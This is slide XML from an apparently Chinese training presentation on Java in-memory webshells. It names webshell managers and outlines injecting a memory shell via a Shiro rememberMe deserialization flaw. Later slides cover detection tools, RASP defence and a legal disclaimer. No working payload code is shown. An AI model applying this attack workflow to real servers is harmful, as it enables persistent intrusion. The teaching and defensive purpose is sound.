            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        }catch (Exception e){}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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zh-CN" altLang="en-US"/>
              <a:t>常用的开源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>管理工具：哥斯拉、蚁剑、冰蝎</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>哥斯拉：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://github.com/BeichenDream/Godzilla</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需要用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>环境来启动，下载后通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>java -jar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的方式启动对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件，进行工具的初始化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>操作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1821815" y="3018155"/>
            <a:ext cx="6424295" cy="3613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3405505" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以通过该工具先生成对应的恶意类，然后将其恶意类通过文件上传的方式打入目标服务器，最后通过该管理工具进行对目标的添加，最后进行利用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="1149350"/>
            <a:ext cx="7757160" cy="2735580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="245745" y="3554730"/>
            <a:ext cx="6467475" cy="3076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zh-CN" altLang="en-US"/>
              <a:t>冰蝎：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目地址：https://github.com/rebeyond/Behinder</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蚁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>剑：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>https://github.com/AntSwordProject/AntSword-Loader</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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3485"/>
            <a:ext cx="11701145" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反序列化整合内存马实战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>训练：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反序列化漏洞打入内存马</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、构建反序列化内存马并加密生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字符串。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、抓包修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>rememberMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>值。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验证。</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3485"/>
            <a:ext cx="11701145" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搭建最简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：我在搭建过程中用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JDK8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tomcat8.5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505460" y="1923415"/>
            <a:ext cx="10296525" cy="46469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3485"/>
            <a:ext cx="11701145" cy="545465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、构建反序列化内存马并加密生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字符串。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="283845" y="2068830"/>
            <a:ext cx="10422890" cy="4452620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="对象 4">
            <a:hlinkClick r:id="" action="ppaction://ole?verb="/>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9706610" y="1213485"/>
          <a:ext cx="552450" cy="542925"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1025" name="" r:id="rId2" imgW="552450" imgH="542925" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="" r:id="rId2" imgW="552450" imgH="542925" progId="Package">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 1024"/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId3"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="9706610" y="1213485"/>
                        <a:ext cx="552450" cy="54292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3485"/>
            <a:ext cx="11701145" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、抓包修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>rememberMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>值。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3558540" y="1739900"/>
            <a:ext cx="6115050" cy="4799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3485"/>
            <a:ext cx="11701145" cy="459105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验证：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="156210" y="1901825"/>
            <a:ext cx="8331835" cy="1518920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611620" y="2679700"/>
            <a:ext cx="3006725" cy="3634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内存马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>防御</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zh-CN" altLang="en-US"/>
              <a:t>整体防御思路：由于内存马是一种仅在内存中执行，不写入硬盘的恶意程序，其能够隐蔽地进行攻击，同时躲避常规的病毒检测手段，只能通过识别内存马特征，检出内存马方式最为蓝方防御内存马攻击的整体思路。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果通过人工干预跟踪内存马特征的方式进行检测对人员要求比较高，可以用一些辅助检测工具来实现：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>通过jsp脚本扫描java web Filter/Servlet型内存马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://github.com/c0ny1/java-memshell-scanner</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Alibaba Java诊断利器Arthas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>https://github.com/alibaba/arthas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>内存马查杀工具，尤其针对Agent型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：https://github.com/geekmc/FindShell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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zh-CN" altLang="en-US" b="1"/>
              <a:t>内存马种类的逻辑性划分：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>数据结构型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>马。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>API型内存马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、混合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>型内存马。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基于不同目标产生不同编写手法会出现混合内存马 既调用数据结构也调用API，具体看侧重方向。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、内核</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>型内存马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>直接作用于操作系统的内核层面，而不是普通的应用程序级别，根据不同的系统实现，Windows liunx MAC，利用对应的系统漏洞，内核模块和内核内存修改来进行注入系统内核马。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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en-US" altLang="zh-CN"/>
              <a:t>RASP运行时防护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>RASP（Runtime Application Self-Protection）是一种在应用程序运行时进行安全防护的技术。它可以感知到应用程序内部的各种行为，包括内存马在内存中的执行。例如，你可以在Filter类型的内存马创建的阶段进行hook，从而在早期就检测到风险，RASP通常与其他安全措施（如防火墙、入侵检测系统等）结合使用，以提供多层防御。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>优点：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实时防护：能够立即检测和响应攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>准确性强：通过在应用内部进行监控，可以更准确地识别恶意行为。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>误报率低：针对性的检测可以减少误判的可能性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缺点：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>侵入性强：需要修改应用程序代码或部署额外的组件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>资源消耗：可能会增加应用程序的CPU和内存使用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目：https://github.com/baidu/openrasp</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r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>法律法规</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zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>以上讲解内容仅用于信息安全教学和演示，请勿用于其他用途！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800"/>
              <a:t>中国人民共和国网络安全法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>第十二条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>第二款</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
